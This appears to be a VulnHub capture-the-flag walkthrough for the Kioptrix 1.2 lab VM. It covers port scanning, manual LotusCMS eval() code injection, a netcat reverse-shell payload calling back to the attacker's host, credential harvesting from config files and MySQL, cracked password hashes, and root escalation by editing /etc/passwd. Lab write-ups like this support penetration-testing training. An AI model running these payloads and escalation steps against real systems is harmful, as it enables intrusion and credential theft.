Kioptrix: Level 1.2 (#3) Walkthrough (Vulnhub)
Intro:
This VM is part of the TJ_Null list to prepare for the OSCP, you can download it here.
Nb: A good way of learning is to solve these problems your self and see how did others solve them
Start by downloading the VM and make sure it is under the same network as your kali machine and let’s get started!
Scanning:
looking for the IP address
netdiscover
looking for open ports (without details)
nmap -T4 192.168.204.141 -p-
performing OS detection, version detection, script scanning on open ports only
nmap -p22,80 -A 192.168.204.141
Enum:
let’s start with http (because ssh version is recent, we will leave it in case of credential exposure)
nikto -h http://192.168.204.141
Ps: don’t forget to note your findings
next, we need to fuzz for files and directories
export URL=http://192.168.204.141/FUZZ
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt - hc 404 $URL
export URL=http://192.168.204.141/FUZZ/ # add a /
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt - hc 404 $URL
next, let’s try manual discovery/fuzzing
add kioptrix3.com to the /etc/hosts file
Note that loneferret is a possible username
we found some services
let’s look for any vulnerabilities in searchsploit
searchsploit phpmyadmin
searchsploit lotuscms
Since OSCP exam allows only one time usage of Metasploit, we need to understand the vulnerability and exploit it manually
Exploitation:
downloading the payload
searchsploit -m php/remote/18565.rb
Let’s try to understand what the payload is consist of
it looks like the problem relies in the page parameter, in eval() function in particular
we want to test some HTML special chars like -‘ “ # ) ( , ; in the URL
lets try the single quote “ ‘ ” in the url
http://kioptrix3.com/index.php?page=index%27
the request generated an error which is a good sign!!!
notice that the web root directory is /home/www/
we need to take a visit at the eval() function (here), and at HTML special characters (here)
Now, let’s interrupt the request with burp and send it to the repeater, and try different combinations
after trying many options, this code got executed
index’);eval(‘phpinfo();’);%23
> > > Code Execution !!!
Let’s verify with php system() function
let’s open a netcat listenner
nc -nvlp 8888
send this reverse shell command as a POST request using burp
page=index’);eval(“system(‘nc+192.168.204.132+8888+-e+/bin/bash’);”);#
> > > We have a shell !!!
Post Exp:
use S1ren’s Breakout code to gain a stable shell and valid tty
############################################################
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht - color=auto'
# Keyboard Shortcut: Ctrl + Z (Background Process.)
stty raw -echo ; fg ; reset
stty columns 200 rows 200
############################################################Let’s gather more information
looking for locally available services
netstat -tulpn
looking for system users
cat /etc/passwd
search the web root directory /home/www/kioptrix3.com for any creds
grep -Ri "mysql" /home/www/kioptrix3.com | grep -E "username|password" - color=autoWe have found mysql credentials
let’s login
mysql -uroot -pfuckeyou
show databases;
use mysql;show tables;
select * from user;localhost | root | *47FB3B1E573D80F44CD198DC65DE7764795F948E
Let’s try another DataBase
use gallery;
show tables;
select * from dev_accounts;
try hashes.com to crack them
dreg | 0d3eccfb887aabd50f243b3f155c0f85: Mast3r
loneferret | 5badcaf789d3d1d09794d8f021f40f0e: starwars
now the obvious thing is to login using one the users, and list what sudo commands are allowed
su loneferret
sudo -l
> > >We have a root access to a text editor !!!
Go to kali and create a passwd using openSSL
openssl passwd -1
create a user line in passwd format
USER:PASSWD:UID:GID:USER:/home/USER:/bin/bash (SID:GID = 0:0 for root privileges)copy it to /etc/passwd, save and quit
now switch user
> > > You are root !!!
I hope this has been informative, want to give a big thanks to S1ren for all her help